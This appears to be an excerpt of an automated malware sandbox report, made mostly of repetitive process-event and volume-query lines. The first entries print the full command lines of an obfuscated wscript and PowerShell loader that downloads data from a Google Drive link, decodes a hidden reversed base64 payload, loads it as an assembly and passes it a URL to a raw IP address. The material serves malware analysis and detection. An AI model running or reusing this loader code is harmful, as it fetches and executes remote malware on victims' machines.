iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagiefezc1uwvbficagicagicagicagicagicagicagicagicagicagicattuvtqkvyzevgsu5pdglvtiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagumhqqvdhvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagifpit0djvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiffvlhvpbnqgicagicagicagicagicagicagicagicagicagicagigxzagjqshrzleludfb0ciagicagicagicagicagicagicagicagicagicagicagaik7jyagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicjuawvliiagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcefjzsagicagicagicagicagicagicagicagicagicagicagcnb3wulprnnlecagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4xnzyumtqxlzm2l2dvb2r0agluz3n3axroz3jlyxrjb21lymfja3dpdghncmvhdhroawducy50suyilcikru5wokfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmildasmck7c1rhunqtc2xlzvaomyk7u3rhcnqgicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmi'+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnvunraw1hz2vvcmwgpsawverodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2enkydkjysnjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1ciawveq7vunrd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyknsawvuddtvq1fpbwfnzuj5dgvzid0gvunrd2viq2xpzw50lkrvd25sb2fkrgf0yshvq1fpbscrj2fnzvvybck7vunraw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcnkycovunraw1hz2vcexrlcyk7vunrc3rhcnrgbgfnid0gmfrepdxcqvnfnjrfu1rbulq+pjburdtvq1enkydlbmrgbgfnid0gmfrepdxcqvnfnjrfru5epj4wveq7vunrc3rhcnrjbmrleca9ifvduwltywdlvgv4dc5jbmrlee9mkfvduxn0yxj0rmxhzyk7vunrzw5ksw5kzxggpsbvq1fpbwfnzvrlehqusw5kzxhpzihvq1flbmrgbgfnkttvq1fzdccrj2fydeluzgv4ic1nzsawic1hbmqgvunrzw5ksw5kzxgglwd0ifvduxn0yxj0sw5kzxg7vunrc3rhcnrjbmrlecarpsbvq1fzdgfydezsywcutgvuz3roo1vduwjhc2u2nccrj0xlbmd0aca9iccrj1vdjysnuscrj2vuzeluzgv4ic0gvunrc3rhcnrjbmrledtvq1fiyxnlnjrdb21tyw5kiccrjz0gvunraw1hz2vuzxh0lln1ynn0cmluzyhvq1fzdgfydeluzgv4lcbvq1fiyxnlnjrmzw5ndggpo1vduwjhc2u2nfjldmvyc2vkid0glwpvaw4gkfvduwjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbqexogrm9yrwfjac1pymply3qgeybvq1ffih0pwycrjy0xli4tkfvduwjhc2u2nenvbw1hbmqutgvuz3rokv07vunry29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhvq1fiyxnlnjrszxzlcnnlzck7vunrbg9hzgvkqxnzjysnzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfvduwnvbw1hbmrcexrlcyk7vumnkydrdmfptwv0ag9kid0gw2rubglilklplkhvbscrj2vdlkdlde1ldghvzcgwverwqukwveqpo1vduxzhau1ldghvzc5jbnzva2uojysnvunrjysnbnvsbcwgqcgwver0ehqusutptdayjvnht0wvnjmvmtqxljynkyc3ms4zlji5ms8vonb0dggwveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0ascrj3zhzg8wveqsidburefkzeluuhjvy2vzczmymfrelcawverkzxnhdgl2ywrvmfrelcawverkzxnhdgl2ywrvmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwnkycwverkzxnhdgl2ywrvjysnmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwwvccrj0qxmfreldburgrlc2f0axzhzccrj28wveqpkscrjzsnks1yrxbsywnfj1vduscsw2niyvjdmzygic1yrxbsywnfjzburccsw2niyvjdmzkgic1yrxbsywnfichby0hhul04mctby0hhul0xmjerw2niyvjdmtiyksxby0hhul0xmjqpihwuicgor0vulxzhuklhqkxliccqbwrykicplm5htuvbmywxmswyxs1kb0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ucqimageurl = 0tdhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 0td;ucqwebclient = new-object system.net.w'+'ebclient;ucqimagebytes = ucqwebclient.downloaddata(ucqim'+'ageurl);ucqimagetext = [system.text.encoding]::utf8.getstring'+'(ucqimagebytes);ucqstartflag = 0td<<base64_start>>0td;ucq'+'endflag = 0td<<base64_end>>0td;ucqstartindex = ucqimagetext.indexof(ucqstartflag);ucqendindex = ucqimagetext.indexof(ucqendflag);ucqst'+'artindex -ge 0 -and ucqendindex -gt ucqstartindex;ucqstartindex += ucqstartflag.length;ucqbase64'+'length = '+'uc'+'q'+'endindex - ucqstartindex;ucqbase64command '+'= ucqimagetext.substring(ucqstartindex, ucqbase64length);ucqbase64reversed = -join (ucqbase64command.tochararray() pyz foreach-object { ucq_ })['+'-1..-(ucqbase64command.length)];ucqcommandbytes = [system.convert]::frombase64string(ucqbase64reversed);ucqloadedass'+'embly = [system.reflection.assembly]::load(ucqcommandbytes);uc'+'qvaimethod = [dnlib.io.hom'+'e].getmethod(0tdvai0td);ucqvaimethod.invoke('+'ucq'+'null, @(0tdtxt.ikol02%sgol/63/141.6'+'71.3.291//:ptth0td, 0tddesativado0td, 0tddesativado0td, 0tddesati'+'vado0td, 0tdaddinprocess320td, 0tddesativado0td, 0tddesativado0td,0tddesativado0td,0tddesativado0td,'+'0tddesativado'+'0td,0tddesativado0td,0tddesativado0td,0t'+'d10td,0tddesativad'+'o0td))'+';')-replace'ucq',[char]36 -replace'0td',[char]39 -replace ([char]80+[char]121+[char]122),[char]124) |. ((get-variable '*mdr*').name[3,11,2]-join'')"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
